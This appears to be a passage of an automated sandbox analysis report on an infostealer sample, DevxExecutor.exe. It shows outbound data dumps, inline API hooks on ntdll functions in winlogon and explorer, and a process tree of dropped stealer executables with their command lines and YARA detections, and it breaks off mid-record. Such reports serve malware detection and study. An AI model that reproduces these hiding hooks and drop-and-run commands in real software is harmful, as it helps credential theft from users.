                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 22 6b 51 e4 b6 fd 01 28 ec ed 9f b1 ea a7 c9 7f 3f 4c 5f 32 01 ea 4c 6d 00 db 52 f9 a0 1d d3 27 26 76 8f c8 22 e3 48 79 f9 cb 5a aa ce 65 37 55 94 f6 b3 4d b7 42 f1 bf 1b 60 0c da d2 fc ef 01 37 11 d4 56 0d d1 5e 41 98 42 fd 61 ab c7 e8 80 70 c3 5f 80 e0 6d 37 40 42 d7 ea 9c 73 ae 78 be a2 3e 2b 43 af 82 87 05 4c ff ab ac a6 29 20 d1 e9 f3 76 ea 6e cc f8 54 8f e1 df a3 07 eb b5 25 5a d8 b1 fa b9 7b 77 09 7b cb 4a 7f 41 51 85 08 28 bb 9f 30 4e 17 ce a5 4b 35 a5 e3 43 1c 32 fe 64 55 e7 fd fc 15 4f bf 17 87 7d 8b a6 6b 21 43 29 5c 69 7a 5d c8 0f a1 8d 21 a7 02 dd d7 8f 4d e4 ac dd 3c 7e 0b 8c d1 9c b9 ee 6d 1e f8 bc 51 1a de 8e 3c f0 b1 d8 b6 f1 87 ed b5 98 40 7d 84 af 88 d0 f7 61 08 51 29 bd 56 df ae bb 74 69 f2 58 8e 51 f2 ba 5c 6c 7a 7f d3 26 5c 1d 21 22
                                                                                                                                                          Data Ascii: "kQ(?L_2LmR'&v"HyZe7UMB`7V^ABap_m7@Bsx>+CL) vnT%Z{w{JAQ(0NK5C2dUO}k!C)\iz]!M<~mQ<@}aQ)VtiXQ\lz&\!"
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: be 7a c4 15 93 63 7f 3c 39 e4 be ec 2d b5 a5 82 1a 4c cd 98 41 f5 96 67 61 92 20 c7 aa 0b 34 42 d2 ec 82 54 d2 74 ba 1c 52 ff 34 60 a1 a3 e1 15 95 00 89 8e fe 86 c8 73 de ca 8b 6f 80 1c 14 d8 b1 18 36 d3 06 d7 f6 0c 19 cd 6b 0d 62 5d c2 ac 3d 46 62 bf ce 36 16 c0 d8 44 c5 8d 74 9b fe df 8c 15 b3 b8 2a 83 9a 10 8a 66 91 40 02 68 ec 78 32 c8 b8 2e 79 2b bf 52 e6 1c 2a bf 4f 05 24 45 75 80 80 f6 db 71 ce 2a 09 17 eb a8 9d 36 bb fe 10 c9 24 57 4f 6e cd 20 a2 52 0a 8b 7c 2d 5f 5f e1 02 82 c5 95 10 6b b5 23 63 45 09 fa 4c 0b 83 2a db 5d 49 1c 82 4b 36 cb d3 1d c0 ba cf 4a 89 ee 66 f0 61 a2 f4 7b 7e 92 db 5f 64 e1 b9 f0 9d ed 27 9b 21 35 6b f3 ac 5c 6e 96 74 0c 00 72 e9 65 42 1d 27 37 d9 45 ef 17 1f 7a 3e 93 95 6f 4f 7a 81 c6 38 a4 8a 82 10 9e d5 4c 98 5b b3 1c
                                                                                                                                                          Data Ascii: zc<9-LAga 4BTtR4`so6kb]=Fb6Dt*f@hx2.y+R*O$Euq*6$WOn R|-__k#cEL*]IK6Jfa{~_d'!5k\ntreB'7Ez>oOz8L[
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: 09 7b 17 ba 67 b9 f7 07 c8 f6 4a 80 04 90 dd 3c b0 a8 27 79 06 4a 70 2f ce 2e d8 f1 8a d8 14 e1 4c 86 c8 5b 85 1a f9 88 d7 23 d1 54 7f 2f 13 9d ef 63 ec f8 89 57 b2 20 25 59 4a de 30 d3 77 de 5f 2f 89 84 69 6c 10 45 aa 75 9c 77 51 38 e2 cf 33 37 04 7a f9 9c cb c0 c4 c7 58 01 a7 77 37 ae 6e da 2e db a9 07 66 cb 04 05 74 dd 27 42 bc ff e6 14 5a d8 bf 1c c1 34 ad e1 37 ac bb 60 ae 27 3f fe de 12 85 13 ff c5 0a 28 d6 d2 e7 5f 3c de 75 55 e8 f4 4c 31 38 e1 1e ea c3 58 68 62 bf cc ba b0 29 b8 a8 46 eb 94 69 27 67 38 b7 b5 42 81 cf ae 1e 31 90 83 bc 54 ca 0d 2f a4 a6 50 37 e8 ac 0f fc ab 01 9f 67 8b d9 31 20 d8 34 76 3b fe de e1 e6 ce 53 96 30 1f d1 3e ce 3c 5b fd d9 48 cf c1 fc 49 fc eb 78 a6 c2 ae e2 da da 1d 40 a1 bb 0d e4 81 27 64 7f af 28 fa 1d 3d 71 9f a6
                                                                                                                                                          Data Ascii: {gJ<'yJp/.L[#T/cW %YJ0w_/ilEuwQ837zXw7n.ft'BZ47`'?(_<uUL18Xhb)Fi'g8B1T/P7g1 4v;S0><[HIx@'d(=q
                                                                                                                                                          2024-05-09 15:48:17 UTC16384OUTData Raw: f4 58 4d a9 bb 6a f1 4e 6b 3f db af 2d c2 6b 4b 25 db 92 8d cd e1 5d 93 cc e7 3d 22 65 c0 ad c7 7f 20 43 f4 c9 dd 86 67 32 fe c0 bd e8 0d ad a5 32 98 c1 91 d9 a6 a2 c2 d6 33 95 3f 69 6a 3a bc bd de 62 f7 71 b1 a7 87 f9 e2 3b 04 b7 cc 82 a8 2e c9 42 ea 27 50 05 87 dd 09 53 86 4e 92 0c 2c de be 70 42 db cf 23 6b 6d fc 5e a4 d6 e9 96 be 52 9d 58 41 c7 4b 1e 45 1b 75 50 82 b0 0f 41 d1 40 21 c4 f0 9e a9 f4 25 c4 81 05 b2 b5 1e 95 81 3a 2c 33 e9 88 df 11 1e 62 37 9e 60 fe 84 91 48 e7 de cc ff 14 c1 fc 66 c0 b1 91 60 2f de f1 a7 62 c7 06 67 bd d0 15 70 7d 47 fc 93 af 9b 70 ae aa f3 4b 89 87 33 78 02 6e 80 69 2d 0c 23 ef c3 5a ec 70 a2 42 1b 73 d3 96 4b be 18 db a5 0b 94 f3 1e df b4 45 18 7a f0 87 e2 c3 06 2c 58 e7 ef 38 fe 4c 62 e3 e0 22 16 3d 90 17 45 e3 c6 8a
                                                                                                                                                          Data Ascii: XMjNk?-kK%]="e Cg223?ij:bq;.B'PSN,pB#km^RXAKEuPA@!%:,3b7`Hf`/bgp}GpK3xni-#ZpBsKEz,X8Lb"=E
                                                                                                                                                          2024-05-09 15:48:21 UTC389INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                          Date: Thu, 09 May 2024 15:48:21 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 1700
                                                                                                                                                          Connection: close
                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                          Code Manipulations

                                                                                                                                                          User Modules

                                                                                                                                                          Hook Summary

                                                                                                                                                          Function NameHook TypeActive in Processes
                                                                                                                                                          ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                                                          ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                                                                                                          Processes

                                                                                                                                                          Process: winlogon.exe, Module: ntdll.dll
                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                          Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:17:47:04
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\DevxExecutor.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\DevxExecutor.exe"
                                                                                                                                                          Imagebase:0x360000
                                                                                                                                                          File size:46'285'824 bytes
                                                                                                                                                          MD5 hash:E4897EF7419E128B1F7473119CE0BD07
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:17:47:10
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:17:47:11
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:17:47:12
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\main.exe"
                                                                                                                                                          Imagebase:0x7ff6d6e90000
                                                                                                                                                          File size:37'726'222 bytes
                                                                                                                                                          MD5 hash:1EE0837EEDF03E82AA652B1BF157387F
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:17:47:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:17:47:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:17:47:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:17:47:13
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\main.exe"
                                                                                                                                                          Imagebase:0x7ff6d6e90000
                                                                                                                                                          File size:37'726'222 bytes
                                                                                                                                                          MD5 hash:1EE0837EEDF03E82AA652B1BF157387F
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2294300603.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2207767340.0000020102CDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                          File size:32'454'900 bytes
                                                                                                                                                          MD5 hash:A1DDA0E77B597A95DC0D894A4D28780A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:17:47:16
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          General

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
